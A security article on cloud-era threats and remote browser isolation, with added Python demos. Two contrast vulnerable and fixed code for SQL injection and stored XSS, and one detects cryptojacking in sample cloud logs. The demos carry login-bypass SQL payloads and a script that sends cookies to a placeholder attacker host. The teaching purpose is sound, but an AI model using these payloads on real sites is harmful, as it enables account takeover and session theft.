According to the most recent Rightscale State of the Cloud survey, a staggering 91% of companies now use a public cloud implementation. Although this is a positive technological development, one can’t ignore the fact that for these companies, the traditional security perimeter no longer exists. They’re placing critical data and workloads on platforms that they don’t own, and they’re constantly transmitting these essentials back and forth along the public-facing internet.
The prevalence of the cloud means that security has changed. Under the shared-responsibility model, Infrastructure as a Service (IaaS) providers secure the underlying infrastructure, but each organization remains responsible for its own identities, credentials, data and configuration. Rather than try to break into cloud-provisioned services directly, many attackers now try to steal passwords from users, with credential theft increasing 98% since 2018. Even if the credentials only unlock an email account, that account typically receives the password-reset links for everything else, so attackers can use it to unlock the rest.
In short, the corporate world has transitioned wholescale to the cloud. This has dramatically changed the landscape of threats and the ways in which people need to protect themselves. What’s more, although the changes have been dramatic, not many users are fully cognizant of the dangers that they face.
How Does Security Change in a Perimeter-less Era?
The advent of the cloud has given rise to new attacks while familiar attacks are evolving and becoming more difficult to detect. Here’s an updated threat catalog:
Phishing and BEC
When it comes to evolved cyber attacks, phishing scams are the tip of the spear. These no longer take the form of a stranger asking for money; they now often take the form of business email compromise (BEC). These attacks don't just try to steal your login credentials. Rather, they target employees in accounts payable, posing as the CEO or a high-level customer, and the attackers' objective is to fool those employees into wiring money directly to an account the attackers control. Not only is this form of attack effective, it has also increased by 500% in the last year.
What about an attack where you don't even have to open an email? Let's say that you visit a site that carries ads. The website isn't in charge of placing the ad; an ad network fills the slot, often without vetting the creative. That means attackers can buy ad placements that carry malicious code, a technique known as malvertising. When you load a page with a malicious ad, your browser runs the ad's script just as it runs any other third-party script, and that script can redirect you to a page that exploits a browser or plugin flaw or that imitates a login page. If the exploit succeeds, the attacker can track your browsing and intercept information you enter, including passwords.
Attackers have other ways to plant malicious code on websites and reach their users. If a website accepts input, via contact forms, search boxes or login portals, and builds database queries by gluing that input into a SQL string, it is vulnerable to SQL injection. Instead of a username or password, the attacker types SQL fragments into the form. The database then interprets the input as part of the query rather than as data, letting the attacker bypass the login, read or modify every table the application can reach, and, with some database configurations, run commands on the server itself.
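The following added example (not from the original article) shows the flaw and its fix side by side using Python's built-in sqlite3 module: a login query that concatenates user input, and the same check done with a parameterized query. The table, the account and the two payloads are constructed for the demonstration; a real application would also store password hashes rather than plaintext.

```python
import sqlite3


# Constructed demo data: a single user table with one account.
# (Real systems store password hashes, never plaintext; this keeps the
# example focused on the query, not on credential storage.)
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    return conn


def login_vulnerable(conn, username, password):
    """Builds the SQL statement by string formatting.

    Whatever the user typed becomes part of the statement text, so quotes,
    OR clauses and comment markers are parsed as SQL, not as data.
    Shown only to illustrate the flaw; do not copy.
    """
    query = (
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same check with bound parameters.

    The statement text is fixed; the driver hands the values to SQLite
    separately, so they can never change the structure of the query.
    """
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(query, (username, password)).fetchone()
    return row[0] if row else None


# Two classic payloads (constructed). The first uses a comment marker to
# chop off the password check; the second closes the string literal and
# appends a tautology so the WHERE clause is always true.
PAYLOADS = {
    "comment out password check": ("alice' --", "wrong"),
    "tautology in password field": ("nobody", "' OR '1'='1"),
}


def compare(conn):
    """Runs each payload through both implementations; returns a summary."""
    results = {}
    for name, (user, pw) in PAYLOADS.items():
        results[name] = {
            "vulnerable": login_vulnerable(conn, user, pw),
            "safe": login_safe(conn, user, pw),
        }
    return results


if __name__ == "__main__":
    db = make_db()
    for name, outcome in compare(db).items():
        print(f"{name}: concatenated -> {outcome['vulnerable']!r}, "
              f"parameterized -> {outcome['safe']!r}")
```

Both payloads log in as alice against the concatenated query and fail against the parameterized one, because the bound values are never parsed as SQL. The same rule applies to every database driver: fixed statement text, values passed separately.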
Hackers can use cross-site scripting (XSS) to hurt you in two ways. By planting script in a website you visit, they run code in your browser under that site's identity, so they can steal your session cookies or tokens and act as you. If a website or application you host renders attacker-supplied content without escaping it, the same technique runs against your customers and steals their data. As such, cross-site scripting attacks are very dangerous, and they account for half of all attacks on web applications.
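As an added example (not part of the original article), here is the server-side rendering mistake behind most stored XSS, and its fix, in Python. A comment page interpolates a user-submitted comment straight into HTML; the hardened version HTML-encodes it first. The comment text and the cookie-stealing payload are constructed for the demonstration, and the attacker's collection hostname is a placeholder.

```python
import html

# Constructed payload: a "comment" that is really a script which ships the
# victim's cookies to an attacker-controlled host (placeholder hostname).
XSS_PAYLOAD = (
    "Nice post!<script>"
    "new Image().src='https://attacker.example/c?'+document.cookie"
    "</script>"
)

# Minimal page template; {body} is where the comment is inserted.
PAGE = ('<html><body><h1>Comments</h1>'
        '<div class="comment">{body}</div></body></html>')


def render_vulnerable(comment):
    """Interpolates the comment as raw HTML.

    Any <script> tag or event-handler attribute in the comment becomes part
    of the page and executes in every visitor's browser with the site's
    origin. Shown only to illustrate the flaw; do not copy.
    """
    return PAGE.format(body=comment)


def render_safe(comment):
    """HTML-encodes the comment before interpolation.

    html.escape turns <, >, &, " and ' into entities, so the browser
    displays the payload as text instead of parsing it as markup.
    """
    return PAGE.format(body=html.escape(comment, quote=True))


def has_active_content(page):
    """Crude check used to show the difference: does the rendered page
    contain a live <script> tag, as opposed to escaped &lt;script&gt; text?"""
    return "<script>" in page.lower()


if __name__ == "__main__":
    print("vulnerable page contains live script:",
          has_active_content(render_vulnerable(XSS_PAYLOAD)))
    print("escaped page contains live script:   ",
          has_active_content(render_safe(XSS_PAYLOAD)))
    print(render_safe(XSS_PAYLOAD))
```

Two caveats worth remembering: escaping is context-specific (html.escape is right for HTML text and quoted attributes, but not for content placed inside a JavaScript string or a URL, which need their own encoders), and marking the session cookie HttpOnly means that even a script that does slip through cannot read document.cookie.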
In all likelihood, you've heard of ransomware. Ransomware encrypts a user's files. The user can't use or recover these files while they're encrypted, and must pay the attacker, usually in cryptocurrency, in order to have them restored. Cryptocurrency isn't just bought and sold; it's generated, or "mined", by large banks of computers racing to solve proof-of-work puzzles, which in practice means computing enormous numbers of hashes. Mining cryptocurrency is therefore quite expensive. The infrastructure currently used to mine cryptocurrency legitimately consumes more electricity than some small countries.
Here's where cryptomining enters the fray. Rather than pay for the expensive infrastructure needed to mine cryptocurrency, hackers steal the compute. By stealing credentials to your public or private cloud, whether a console password or an API key, they spin up or hijack compute resources and put them to work mining on their behalf; this is cryptojacking. The symptoms are subtle: applications run a little slower, CPU sits pegged, and in a public cloud the first real sign is often an unexpectedly large bill or instances launched in regions and instance types you never use. Unless you watch for those signals, you might not know you've been breached.
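The cloud variant leaves a trail in the control plane even when the instances themselves look healthy. The following added example (not from the original article) runs a simple detection over a handful of constructed, simplified CloudTrail-style records: it flags RunInstances calls in regions the account has never used, instance types outside the organization's normal families, and bursts of launches by a single identity. The records, the baseline and the thresholds are all invented for the demonstration.

```python
from collections import Counter

# Constructed, simplified CloudTrail-style records. Field names follow
# CloudTrail's conventions, but every value here is invented for the example.
SAMPLE_EVENTS = [
    {"eventName": "ConsoleLogin", "awsRegion": "us-east-1",
     "userIdentity": {"userName": "alice"}, "requestParameters": {}},
    {"eventName": "RunInstances", "awsRegion": "us-east-1",
     "userIdentity": {"userName": "alice"},
     "requestParameters": {"instanceType": "t3.medium", "maxCount": 1}},
    {"eventName": "RunInstances", "awsRegion": "ap-southeast-1",
     "userIdentity": {"userName": "alice"},
     "requestParameters": {"instanceType": "p3.8xlarge", "maxCount": 20}},
    {"eventName": "RunInstances", "awsRegion": "sa-east-1",
     "userIdentity": {"userName": "alice"},
     "requestParameters": {"instanceType": "g4dn.12xlarge", "maxCount": 20}},
    {"eventName": "RunInstances", "awsRegion": "us-east-1",
     "userIdentity": {"userName": "bob"},
     "requestParameters": {"instanceType": "m5.large", "maxCount": 2}},
]

# Assumed baseline for this fictional account: where it normally runs and
# which instance families its workloads use. In production this would be
# derived from historical activity rather than hard-coded.
BASELINE_REGIONS = {"us-east-1"}
ALLOWED_FAMILIES = {"t3", "m5"}
BURST_THRESHOLD = 10  # instances per identity across the window examined


def instance_family(instance_type):
    """'p3.8xlarge' -> 'p3'. Mining abuse favours GPU and compute-heavy families."""
    return instance_type.split(".")[0]


def find_suspicious_launches(events, baseline_regions=BASELINE_REGIONS,
                             allowed_families=ALLOWED_FAMILIES,
                             burst_threshold=BURST_THRESHOLD):
    """Return one finding per RunInstances call that trips any rule."""
    findings = []
    launched_by_actor = Counter()
    for event in events:
        if event.get("eventName") != "RunInstances":
            continue
        actor = event.get("userIdentity", {}).get("userName", "unknown")
        region = event.get("awsRegion", "unknown")
        params = event.get("requestParameters", {})
        itype = params.get("instanceType", "")
        count = int(params.get("maxCount", 1))
        launched_by_actor[actor] += count

        reasons = []
        if region not in baseline_regions:
            reasons.append(f"launch in never-used region {region}")
        if instance_family(itype) not in allowed_families:
            reasons.append(f"unusual instance type {itype}")
        if launched_by_actor[actor] > burst_threshold:
            reasons.append(f"{actor} has requested {launched_by_actor[actor]} "
                           f"instances in this window")
        if reasons:
            findings.append({"actor": actor, "region": region,
                             "instanceType": itype, "count": count,
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_launches(SAMPLE_EVENTS):
        print(f"{f['actor']} {f['region']} {f['instanceType']} x{f['count']}")
        for reason in f["reasons"]:
            print("   -", reason)
```

Run against the sample, the two GPU launches in unused regions are flagged on all three rules while the routine launches pass. The same signals translate directly into alerting on real control-plane logs, and pair well with billing-anomaly alerts and monitoring of outbound connections from workloads to mining-pool endpoints.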
Ransomware is a huge issue and has been for years. The thing about cryptojacking, however, is that it's growing faster than ransomware. One should arguably be as concerned about cryptojacking as about ransomware, especially because it belongs to a growing category of attacks that can hurt your business without ever leaving an obvious sign that you've been breached.
How to Protect Yourself from New Malware
This list just scratches the surface of the various ills that can befall an unprepared organization, and the truth is that the new perimeter-less version of the internet makes companies especially vulnerable. While your old moat-and-wall security systems may have blocked these breaches in the past, your users aren't inside that perimeter anymore.
Imagine that one of your workers is working from a coffee shop. They aren't inside your perimeter, and they aren't behind your firewall. If they fall victim to a drive-by download, their laptop, which still connects to your network over VPN and to your cloud applications with their credentials, becomes a vector for malware that can spread to the rest of your organization. Nothing is safe!
Hyperbole aside, literally nothing is safe – and your security posture should be based around that assessment.
Zero Trust Browsing
Zero trust browsing assumes that every website you visit is a potential phishing site that could either infect your endpoint with malware or attempt to harvest your credentials. As such, every website you visit needs to be screened for malicious activity – and isolated from your network.
Remote browser isolation is the realization of the zero-trust browsing concept. Users browse the web as usual, via their standard device browser, but all rendering is done remotely by a virtual browser isolated in a container in the cloud or in the DMZ, and only a clean media stream is sent to the device browser. Active content from the internet, scripts, plugins and downloads, executes only inside that disposable container and never on the endpoint, yet the user experience is nearly identical to unshielded browsing. Once the user closes the tab or stops browsing, the container, along with the virtual browser and all content, benign and malicious, is destroyed. One caveat: isolation stops code from reaching the endpoint, but on its own it does not stop a user from typing a password into a convincingly rendered phishing page, which is why isolation is typically paired with URL categorization and a read-only mode that blocks form entry on unknown or suspicious sites.
The only way to fully protect yourself from a chaotic internet is full isolation. If you assume that everywhere you visit is likely to be tainted by malware, you’ll be that much safer as a result.